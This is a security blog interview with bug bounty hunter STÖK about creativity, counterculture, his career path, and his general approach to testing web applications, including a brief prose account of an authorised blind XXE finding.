interviews

SecurityTrails Blog · Apr 13 · by Sara Jelen

The Power of Being a Misfit: Speaking with Fredrik Alexandersson STÖK

Reading time: 16 minutes

Have you ever noticed some of the most creative thinkers and individuals seem to be misfits? There is power in being a misfit — being different, thinking creatively and outside the box, and rejecting established norms. Misfits are also frequently part of the counterculture.

Throughout history, many countercultures that challenged the status quo have bloomed. Each generation has found its own way to challenge authority and, from that, birth innovation. One modern counterculture is hackers. To find out more about the power of being a misfit across many different channels, not just hacking, we spoke with none other than Fredrik Alexandersson, which you all probably know as STÖK.

Whether it’s bug bounty hunting, content creation, skateboarding, or sustainable fashion, STÖK has always found counterculture as his best friend for expressing his creativity. As a misfit himself, he is one of the loudest voices in the modern bug bounty hunting and hacker scene. His online presence and selfless sharing of knowledge and experience in a unique way focused on the right mindset have made STÖK one of the biggest influencers and possibly even the most well-known vloggers on the scene.

We joined STÖK in his hometown of Gothenburg, Sweden, and discussed the hidden power behind misfits, how it feels to be famous in such a non-mainstream space, the true meaning behind “hackers gonna hack, creators gonna create” how he breaks barriers for newcomers to enter cybersecurity, and if anyone really can become a hacker with the right mindset.

Fredrik Alexandersson STÖK

SecurityTrails: Hacker culture and community have always appeared mysterious and secretive to the outside world. How does it feel to be so well-known, famous even, in such an unconventional space?

Fredrik Alexandersson STÖK: To be honest, it feels kind of weird but good at the same time. The influence I gained over the last 3 years has definitely resulted in doors opening to super fun projects and given me access to people I wouldn’t have had access to earlier, which is amazing. But I can’t stop being weirded out by people stopping me in the street asking for selfies; it’s just surreal.

ST: It seems counter-culture has always attracted you. First with skateboarding, then hacking, and even sustainable fashion can be considered part of it. What drew you to these interests, and how would you say they are tied together?

STÖK: I am a creative soul, and I love to express my creativity. Heck, I need to express my creativity! Throughout my life, creativity has manifested itself in many shapes and forms. I’ve always felt more at home with the rebels, punks, outcasts, and misfits, the weird ones. Hackers are just as much the misfits as skateboarders, underground rave DJs, graffiti artists, writers, and designers. I guess, for me, the constant drive to change the status quo, not settling, always trying to learn something new, creating new ways, and experimenting drew me in. That’s what hacking is to me - questioning why things work in a certain way, trying to figure out what makes things tick, and creating something new out of that, plus always learning along the way. The same goes for skateboarding, writing music, creating art, or designing clothes.

What drew you to these interests

ST: You talked about being someone who tends to get easily bored and can quit out of the blue to start something else. What keeps you focused and going with the things you have stuck with?

STÖK: YES! This definitely is my non-neurotypical brain talking, but I get bored when I feel like I have mastered something to a certain degree. For instance, take my passion for juggling.

While traveling through Europe with my parents, we ended up in some major city and stumbled upon a street performer. That person juggled a set of juggling balls with such grace and control, it simply blew my mind. I was mesmerized and had to give it a try! Eventually, I managed to get hold of a pair of tennis balls and started to practice. Later, a set of professional juggling balls, you know the ones filled with sand, with different colors on the squares, and make a thump when you drop them, replacing them. I carried that set of juggling balls with me EVERYWHERE and practiced daily for months and months, juggling anything I could get my hands on, improving and leveling up my juggling game.

I think anyone can learn anything they want with the right motivation, passion, interest, and drive.

One day, after I finally managed to throw a six-ball cascade while riding a unicycle (yeah, those were my circus days for sure), I put the bike in the closet, the balls in the box, and never picked them up again.

I was done.

By that stage, I had acquired a personal skill level of what I would define as 60% of what would be needed compared with mastery. Every increment in my skill set from there on would require a substantial amount of dedication. So I did what I always do and moved along and fell head over heels in love with something else.

But there is something special with computers and new technology. There is always room for improvement. I’ve been deep into computers for over 35+ years, and there is always room to learn new things or a new skill. That’s why I love cybersecurity, you can’t master it, not even to 60%.

ST: “Hackers gonna hack, creators gonna create.” It’s refreshing to see someone actively live what they preach. How important is nurturing creativity through projects outside of cybersecurity, where the “you gotta live and breathe cybersec” narrative is sometimes pushed?

STÖK: It would be a lie if I said I don’t “live and breathe” cybersecurity in some shape or form. It is an industry where you kind of need to keep your ear against the rails. Incidents, network threats, and new research are happening all the time. It is absolutely a big part of my life and has been for years. But I decided a few years back I needed balance in my life. Nowadays, I try to only engage in cyber-related stuff 3-4 times/week, which is a challenge by itself — FOMO is definitely a thing. I make sure to relax, unwind, and let go of things, primarily to avoid burnout and not go insane.

Hackers gonna hack

That’s what hacking is to me - questioning why things work in a certain way, trying to figure out what makes things tick, and creating something new out of that, plus always learning along the way.

ST: I can also see the other part of hackers gonna hack, creators gonna create. By creating and sharing everything you know, you are creating more hackers who hack and create! How important is collaboration and sharing knowledge, even in the competitive bug bounty world?

STÖK: I strongly believe in the core concepts of sharing is caring and giving back to the community where you learn your skills. Honestly, it’s way more fun to hack/skate/party/change the world together with other people. Collaboration and sharing knowledge have always felt more natural to me. Sure it can be a competitive space, but only if you make it so. The only real competition is you and the person you were yesterday.

ST: The positive attitude and mindset that exudes from your online presence are almost contagious. Many of the things you stand for break barriers for newcomers to the industry and stop the gatekeeping seen around cybersecurity. Do you think anyone can become a hacker with the right directive and help?

STÖK: First, thanks.

And yes, simply because being “a hacker” isn’t a title you earn, it’s not a certificate, it’s not a merit, or a title, it’s a mindset! And the second you decide to become a hacker, you are a hacker. It’s that simple.

I think anyone can learn anything they want with the right motivation, passion, interest, and drive. It might take time, patience, and dedication, but I think anyone can learn how to hack stuff. It’s far less of cloaks and daggers than people think.

How do you reflect on that 2020

ST: 2020 was a year where you quit your job to be a full-time bug bounty hunter and content creator. How do you reflect on that year now?

STÖK: When I quit my stable cybersecurity job to join the international Live Hacking circuit in November 2019, I didn’t expect the world to turn upside down by the beginning of May. Everything I had planned - 9+ Live Hacking events, speaking engagements, workshops, and conferences/meetups got shut down and canceled. To be fully transparent and honest, I was devastated. I felt like the rug was swept from beneath my feet, and I got very depressed.

Since I couldn’t travel for vlogging or speaking at cybersecurity conferences, and all my paid gigs were gone, I had to rethink my life, business, and content strategy. But by combining my cybersecurity advisory, YouTube channel, clothing brand, sponsors, and bug bounties, I managed to turn what started as a rather depressing beginning of 2020 into a successful end. At the beginning of 2021, when presented with the opportunity to work with many exceptional experts sharing even more cybersecurity awareness, helping breached organizations, and actively preventing new breaches as a part of the threat intelligence team at TRUESEC, it was a no brainer.

ST: In your pre-bug-bounty-career, you were working with infrastructure in Active Directory. Have you ever won a bounty thanks to that experience?

STÖK: Sure, Active Directory is a big part of the Microsoft universe. And any Windows box connected to a network that uses authentication is usually using some kind of AD connection. Third party SSO integrations, admin panels, VPNs, exchange, IIS servers, you name it, if it runs on Windows, it’s almost always AD related in some way. But the bugs in bounties rarely affect the AD itself, it’s mostly related to bugs inside the web apps that authenticate towards it. Red teaming on the other hand or internal pentesting, that’s a whole other story. And that’s really where my skills shine.

pre-bug-bounty-career

ST: What is the most creative attack you have successfully executed?

STÖK: I’ve executed many creative attacks, but one I can actually talk about is where I had a fully blind XXE in a file upload with no external egress traffic. Since I needed to host a DTD file to execute my payload, I uploaded and hosted a TXT file on another internal domain of the app. The domain was internally whitelisted, and I eventually managed to use that file for my SYSTEM HTTP request to exfiltrate the content of an LFI over DNS as the POC. It was a super lucky edge chase but definitely a creative workflow.

I love blind things, where you need to rely on time and response length.

ST: You are one of the rare ones that went from the blue to the red team! Did offensive hacking help you be a better defender? What did that jump/transition look like for you?

STÖK: HAHA! And now I’m back at the blue side again! Or maybe more on the purple part of the spectrum. And yes, I think it really helps to have been working on the red side if you want to become good at defense. You need to know the workflows, frameworks, tools, and techniques commonly used by APTs and cybercriminals to protect against it. There is more “coolness” factor being on the offensive side. I mean, who doesn’t want to be a stealthy hacker, right?

But incident response during a live breach is red-teaming in reverse. It’s high pressure, adrenaline, and teamwork. You get thrown into a live breach, start to assess the situation, collect intel, run forensics, collect artifacts, and document and secure the environment. While also trying to stay under the radar, waiting for the right time, performing full password resets, and performing a total kick-out of the attacker. Plus, actively monitoring for any changes and making sure the TA doesn’t have any other persistence or access to the system. The forensics team works their way back to patient zero while the rebuild team starts rebuilding as soon as possible. There is no room for mistakes, and every minute counts. I thrive in those situations and love it!

I strongly believe in the core concepts of sharing is caring and giving back to the community where you learn your skills.

ST: How much of your success as a bug bounty hunter would you attribute to your technical skills, and how much to having the right mindset? Work hard or work smart?

STÖK: I have been around computers all my life. My dad used to sell UNIX systems in the mid-80s, so I have always had access to technology. If we take that and the fact that I have worked inside the IT industry as a professional consultant for almost 2.5 decades, it would be ridiculous to say that my tech-savviness did not play into my success. It absolutely played a big role.

I had such rapid success in bounties because I have hacked stuff for most of my life. I just never saw it as hacking, I was a problem solver, a person that has a knack for finding anomalies. I just had to learn a new set of frameworks, tools, and languages. I attribute my creative brain to a lot of the bugs I find. I guess my brain doesn’t work as others do, and I don’t have a fixed methodology. I have a sense of when things are vulnerable. I know it sounds lame and all “hippie sh*t” but I rely heavily on instinct when I’m hacking.

technical skills

ST: You once said bug bounty is a marathon, not a sprint. Can you elaborate more on that thought? What does preparation for the marathon look like to you?

STÖK: It’s all about persistence, endurance, and dedication.

Compare approaching a new target that you never hacked before with the epic battle of choosing a new series to watch on Netflix. I always check how many seasons there are and if it is binge-worthy? For me, 3-5 seasons is a good number to give it a go. That means the app is deep enough, has enough functionality, authentication levels, use cases, and is regularly updated.

The pilot:

This is when you sign up for the app with user1_ and start clicking around while logging everything in Burp to get a feel for what’s going on. If it is good, you stay and get ready to do some damage.

Season 1:

This is when you sign up with user2_ and test the signup flow, test for authentication bypasses, and start to walk the site with 2 users to check for IDORS. Testing functionality will help you understand what this application is all about. In short, this is when you start to understand what the show is about, get familiar with the characters and locations, and get comfortable with the cast.

Season 2:

Business as usual, but the story deepens. You get to know some side stories about the characters, maybe some new locations show up, and a new character gets added to the show. This is where you do some deeper content discovery, try to understand the developers’ ideas, identify and find some weird API endpoints, and maybe start pivoting over to the mobile app. Overall, you have a pretty good idea of what’s going on, and when the season finale hits, you’re excited. And can’t wait for season 3, which is the new feature the devs have talked about in the community forum.

Season 3:

Yes! Your show is back from summer break, and it’s time to reminisce with old friends. But hey, what is this?! They changed one of the actors! The character is the same, but it’s a totally different actor! Sure, they kind of look like the one you fell in love with, but it still feels off!

This is when you realize you went deep enough to find the really nice and interesting bugs because no one that started watching the show at season 3 would know, but you do! And this is where all the fun begins!

ST: You are from Sweden, which is already well known for its security and bug bounty community. What do you think is behind this, and why is Sweden such a fruitful space for hackers?

STÖK: I would contribute it to at least five reasons.

  1. It’s free to get an education in Sweden.
  2. Swedes don’t dub their tv shows, and a bunch of us grew up with US TV series, so most Swedes are fluent in English.
  3. Sweden got the internet at scale in the early 90s.
  4. Swedes social distance by nature.
  5. Sweden is cold, dark, and actually quite depressing for eight months of the year, so most Swedes stay inside, a perfect time to hack.

ST: What can we expect from STÖK in future? Are there any new channels of creativity you anticipate exploring?

new channels of creativity

STÖK: My creative outlet is constantly changing. Today it might be cybersecurity related content, Youtube, Instagram stories, TikTok, or Bounty Thursdays, and tomorrow it’s something else. One thing’s for sure I will always create stuff. For now, YouTube feels like a good long-term format in an ephemeral landscape. I want to leave some stuff for the afterlife, document stuff, and share what I learn. And since I’m back on the blue side, I’m definitely going to create more defense/blue team related content as well for Truesec. Threat intelligence, incident response, and Active Defence are sexy, in my honest opinion. Who knows what tomorrow will bring. Whatever I do will be all about the good vibes!

Honestly, it’s way more fun to hack, skate, party and change the world together with other people.

Final words

We’re only two days away from the end of Bug Bounty Hunting Month but we have finished it with a bang! We hope you’ve enjoyed this interview with none other than STÖK and that you have been able to learn more about what he contributes his creativity to, how he chooses his outlets and what we can expect in the future from one of the most influential bug bounty hunters in the space.

Gain access to the best data for bug bounty hunters and improve your hunting now!

SARA JELEN

Sara believes the human element is often at the core of all cybersecurity issues. It’s this perspective that brings a refreshing voice to the SecurityTrails team. Her ability to bridge cognitive/social motivators and how they impact the cybersecurity industry is always enlightening.